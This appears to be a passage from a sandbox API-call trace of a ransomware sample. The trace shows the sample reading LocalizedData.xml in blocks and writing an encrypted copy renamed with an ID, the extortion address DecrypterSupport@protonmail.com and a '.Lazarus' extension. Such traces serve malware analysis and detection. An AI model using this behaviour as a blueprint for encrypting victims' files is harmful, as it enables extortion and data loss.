HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0066.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0066.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0066.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.841] AreFileApisANSI () returned 1 [0066.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0066.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0066.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0066.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0066.841] AreFileApisANSI () returned 1 [0066.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0066.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 45 [0066.841] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.841] GetFileType (hFile=0x420) returned 0x1 [0066.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.842] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.842] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.842] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.842] CloseHandle (hObject=0x420) returned 1 [0066.842] AreFileApisANSI () returned 1 [0066.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0066.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 45 [0066.842] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.842] GetFileType (hFile=0x420) returned 0x1 [0066.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0066.843] CloseHandle (hObject=0x420) returned 1 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0066.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.844] AreFileApisANSI () returned 1 [0066.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0066.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 45 [0066.844] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c)) returned 1 [0066.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0066.844] AreFileApisANSI () returned 1 [0066.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0066.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0066.844] GetLastError () returned 0x0 [0066.844] SetLastError (dwErrCode=0x0) [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0066.844] GetLastError () returned 0x0 [0066.844] SetLastError (dwErrCode=0x0) [0066.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71688 [0066.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0066.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0066.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0066.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0066.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.845] AreFileApisANSI () returned 1 [0066.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0066.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0066.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0066.845] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.845] GetFileType (hFile=0x420) returned 0x1 [0066.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0066.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0066.846] AreFileApisANSI () returned 1 [0066.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0066.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 45 [0066.846] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.846] GetFileType (hFile=0x428) returned 0x1 [0066.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0066.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0066.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.846] GetLastError () returned 0x0 [0066.846] SetLastError (dwErrCode=0x0) [0066.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.846] GetLastError () returned 0x0 [0066.846] SetLastError (dwErrCode=0x0) [0066.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0066.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.846] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0066.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0066.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0066.852] GetLastError () returned 0x0 [0066.852] SetLastError (dwErrCode=0x0) [0066.853] GetLastError () returned 0x0 [0066.853] SetLastError (dwErrCode=0x0) [0066.853] GetLastError () returned 0x0 [0066.853] SetLastError (dwErrCode=0x0) [0066.853] GetLastError () returned 0x0 [0066.853] SetLastError (dwErrCode=0x0) [0066.853] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.854] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.855] GetLastError () returned 0x0 [0066.855] SetLastError (dwErrCode=0x0) [0066.855] GetLastError () returned 0x0 [0066.855] SetLastError (dwErrCode=0x0) [0066.855] GetLastError () returned 0x0 [0066.855] SetLastError (dwErrCode=0x0) [0066.855] GetLastError () returned 0x0 [0066.855] SetLastError (dwErrCode=0x0) [0066.855] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.855] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.856] GetLastError () returned 0x0 [0066.856] SetLastError (dwErrCode=0x0) [0066.856] GetLastError () returned 0x0 [0066.856] SetLastError (dwErrCode=0x0) [0066.856] GetLastError () returned 0x0 [0066.856] SetLastError (dwErrCode=0x0) [0066.856] GetLastError () returned 0x0 [0066.856] SetLastError (dwErrCode=0x0) [0066.856] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.856] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.856] GetLastError () returned 0x0 [0066.856] SetLastError (dwErrCode=0x0) [0066.857] GetLastError () returned 0x0 [0066.857] SetLastError (dwErrCode=0x0) [0066.857] GetLastError () returned 0x0 [0066.857] SetLastError (dwErrCode=0x0) [0066.857] GetLastError () returned 0x0 [0066.857] SetLastError (dwErrCode=0x0) [0066.857] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.857] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.857] GetLastError () returned 0x0 [0066.857] SetLastError (dwErrCode=0x0) [0066.857] GetLastError () returned 0x0 [0066.857] SetLastError (dwErrCode=0x0) [0066.858] GetLastError () returned 0x0 [0066.858] SetLastError (dwErrCode=0x0) [0066.858] GetLastError () returned 0x0 [0066.858] SetLastError (dwErrCode=0x0) [0066.858] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.858] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.858] GetLastError () returned 0x0 [0066.858] SetLastError (dwErrCode=0x0) [0066.858] GetLastError () returned 0x0 [0066.859] SetLastError (dwErrCode=0x0) [0066.859] GetLastError () returned 0x0 [0066.859] SetLastError (dwErrCode=0x0) [0066.859] GetLastError () returned 0x0 [0066.859] SetLastError (dwErrCode=0x0) [0066.859] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.859] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.859] GetLastError () returned 0x0 [0066.859] SetLastError (dwErrCode=0x0) [0066.859] GetLastError () returned 0x0 [0066.859] SetLastError (dwErrCode=0x0) [0066.859] GetLastError () returned 0x0 [0066.860] SetLastError (dwErrCode=0x0) [0066.860] GetLastError () returned 0x0 [0066.860] SetLastError (dwErrCode=0x0) [0066.860] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.860] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.860] GetLastError () returned 0x0 [0066.860] SetLastError (dwErrCode=0x0) [0066.860] GetLastError () returned 0x0 [0066.860] SetLastError (dwErrCode=0x0) [0066.860] GetLastError () returned 0x0 [0066.860] SetLastError (dwErrCode=0x0) [0066.860] GetLastError () returned 0x0 [0066.861] SetLastError (dwErrCode=0x0) [0066.861] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.861] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.861] GetLastError () returned 0x0 [0066.861] SetLastError (dwErrCode=0x0) [0066.861] GetLastError () returned 0x0 [0066.861] SetLastError (dwErrCode=0x0) [0066.861] GetLastError () returned 0x0 [0066.861] SetLastError (dwErrCode=0x0) [0066.861] GetLastError () returned 0x0 [0066.861] SetLastError (dwErrCode=0x0) [0066.861] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.862] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.862] GetLastError () returned 0x0 [0066.862] SetLastError (dwErrCode=0x0) [0066.862] GetLastError () returned 0x0 [0066.862] SetLastError (dwErrCode=0x0) [0066.862] GetLastError () returned 0x0 [0066.862] SetLastError (dwErrCode=0x0) [0066.862] GetLastError () returned 0x0 [0066.862] SetLastError (dwErrCode=0x0) [0066.862] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.863] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.863] GetLastError () returned 0x0 [0066.863] SetLastError (dwErrCode=0x0) [0066.863] GetLastError () returned 0x0 [0066.863] SetLastError (dwErrCode=0x0) [0066.863] GetLastError () returned 0x0 [0066.863] SetLastError (dwErrCode=0x0) [0066.863] GetLastError () returned 0x0 [0066.863] SetLastError (dwErrCode=0x0) [0066.863] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 